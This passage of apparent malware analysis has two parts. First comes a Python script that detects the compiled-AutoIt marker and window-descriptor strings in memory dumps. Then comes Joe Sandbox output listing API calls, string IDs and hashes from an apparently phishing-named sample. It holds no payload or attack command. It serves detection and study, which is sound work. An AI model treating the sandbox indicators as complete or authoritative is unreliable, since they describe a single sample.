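AutoIt window-descriptor keywords ([ACTIVE, [ALL, [CLASS:, [HANDLE:, [LAST,
[REGEXPTITLE:) that one function compares with __wcsnicmp/__wcsicoll.
Added example; the byte buffer below is constructed, not taken from the sample.
"""
from __future__ import annotations

import re

# Marker string the report lists as a string ID of one function.
AUTOIT_MARKER = ">>>AUTOIT SCRIPT<<<"

# Descriptor prefixes listed as string IDs in the report, upper-cased because
# the sample compares case-insensitively (__wcsnicmp).
DESCRIPTOR_PREFIXES = ("[ACTIVE", "[ALL", "[CLASS:", "[HANDLE:", "[LAST", "[REGEXPTITLE:")

# Same prefixes as a regex over decoded text; the value part stops at ']' or NUL
# so a match cannot run across string boundaries in a memory dump.
DESCRIPTOR_RE = re.compile(
    r"\[(?:CLASS|HANDLE|REGEXPTITLE):[^\]\x00]*\]|\[(?:ACTIVE|ALL|LAST)\]",
    re.IGNORECASE,
)


def find_autoit_marker(data: bytes) -> list[tuple[int, str]]:
    """Offsets of the marker in narrow and UTF-16LE form, lowest offset first.
    Both encodings are searched (an assumption of this example) so the check
    does not depend on how a given build stored the string."""
    hits = []
    for enc in ("ascii", "utf-16-le"):
        needle = AUTOIT_MARKER.encode(enc)
        start = 0
        while (idx := data.find(needle, start)) != -1:
            hits.append((idx, enc))
            start = idx + 1
    return sorted(hits)


def extract_window_descriptors(data: bytes) -> list[str]:
    """Window descriptors present as narrow or UTF-16LE strings anywhere in a
    raw buffer.  UTF-16LE is decoded at both byte alignments because a dump
    gives no guarantee that wide strings start on an even offset."""
    views = (
        data.decode("ascii", errors="replace"),
        data.decode("utf-16-le", errors="replace"),
        data[1:].decode("utf-16-le", errors="replace"),
    )
    found = {m.group(0) for view in views for m in DESCRIPTOR_RE.finditer(view)}
    return sorted(found)


def classify_window_descriptor(title: str) -> dict[str, str]:
    """Map a window-title argument to the mode the sample's comparator selects.
    Anything without a recognised bracket prefix is an ordinary title match.
    Only the single-property forms listed in the report are handled."""
    upper = title.upper()
    for prefix in DESCRIPTOR_PREFIXES:
        if upper.startswith(prefix):
            mode = prefix.strip("[:")
            value = title[len(prefix):].rstrip("]") if prefix.endswith(":") else ""
            return {"mode": mode, "value": value}
    return {"mode": "TITLE", "value": title}


def triage(data: bytes) -> dict:
    """One-shot verdict for a dump or file: does it carry the compiled-AutoIt
    marker, and which window-targeting modes does it reference?"""
    marker_hits = find_autoit_marker(data)
    descriptors = extract_window_descriptors(data)
    return {
        "compiled_autoit": bool(marker_hits),
        "marker_hits": marker_hits,
        "window_descriptors": [classify_window_descriptor(d) for d in descriptors],
    }


# Constructed stand-in for a memory dump: a PE-like header, the marker in
# UTF-16LE at offset 64, three wide descriptors, and a narrow copy of the
# marker at offset 224.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + AUTOIT_MARKER.encode("utf-16-le") + b"\x00" * 16
    + "[CLASS:Notepad]".encode("utf-16-le") + b"\x00\x00"
    + "[REGEXPTITLE:^Invoice.*]".encode("utf-16-le") + b"\x00\x00"
    + "[ACTIVE]".encode("utf-16-le") + b"\x00\x00"
    + b"plain " + AUTOIT_MARKER.encode("ascii") + b" narrow copy"
)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it against a Joe Sandbox .sdmp download or the original .exe by replacing SAMPLE with the file's bytes; the descriptor list tells you which AutoIt window-matching modes the script can use before the script itself is decompiled.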
APIs
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
• Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
• Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
• Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
• Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                                                                                                                                                                                                            • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                                                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                                                                            • API String ID: 1322021666-1919597938
                                                                                                                                                                                                                                                                                                            • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                                                                                                                                                            • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                            • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                                                                                                                                                                                                            • strncnt.LIBCMT ref: 00428646
                                                                                                                                                                                                                                                                                                            • strncnt.LIBCMT ref: 0042865A
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: strncnt$CompareErrorLastString
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1776594460-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
• Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
APIs
• LoadIconW.USER32(?,00000063), ref: 004545DA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
• SetWindowTextW.USER32(?,?), ref: 00454606
• GetDlgItem.USER32(?,000003EA), ref: 0045461F
• SetWindowTextW.USER32(00000000,?), ref: 00454626
• GetDlgItem.USER32(?,000003E9), ref: 00454637
• SetWindowTextW.USER32(00000000,?), ref: 0045463E
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
• GetWindowRect.USER32(?,?), ref: 00454688
• SetWindowTextW.USER32(?,?), ref: 004546FD
• GetDesktopWindow.USER32 ref: 00454708
• GetWindowRect.USER32(00000000), ref: 0045470F
• MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
• GetClientRect.USER32(?,?), ref: 0045476F
• PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
• SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
• Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
• LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
• LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
• LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
• LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
• LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
• LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
• LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
• LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
• LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
• LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
• LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
• LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
• LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
• LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
• LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
• GetCursorInfo.USER32 ref: 00458E03
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
• Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
• Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
• Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
• GetFocus.USER32 ref: 004696E0
• GetDlgCtrlID.USER32(00000000), ref: 004696EB
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: ebb02e35e6dfa5ffdd7817d168aeee7d0d5ad9fdf08ca2eeb32ac17b4f38c1fd
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebb02e35e6dfa5ffdd7817d168aeee7d0d5ad9fdf08ca2eeb32ac17b4f38c1fd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00468107
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID: 0
• API String ID: 3993528054-4108050209
• Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
• Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
• Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
• Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
APIs
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
• _wcscat.LIBCMT ref: 0046F3BC
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
• SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
• DragFinish.SHELL32(?), ref: 0046F414
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 4085615965-3440237614
• Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
• Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
• Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
• Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                                                                                                            • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                                                                                                                                                            • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004669C4
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 00466A90
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00466BEE
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
